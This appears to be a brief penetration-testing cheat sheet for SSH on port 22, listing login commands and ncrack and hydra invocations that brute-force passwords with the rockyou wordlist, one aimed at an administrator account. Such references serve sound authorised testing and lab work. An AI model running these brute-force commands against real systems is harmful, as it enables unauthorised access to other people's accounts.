Skip to content

Port 22 - ssh

ssh with password

ssh <user-name>$(target)

ssh with key

chmod 400 id_rsa
ssh -i id_rsa <user-name>$(target)

ncrack

ncrack -v -U /home/tmp/users.txt -P /usr/share/wordlists/rockyou.txt ssh://$(target):22

hydra

hydra -l user-name -P /usr/share/wordlists/rockyou.txt ssh://$(target) -I -F
hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV $(target) ssh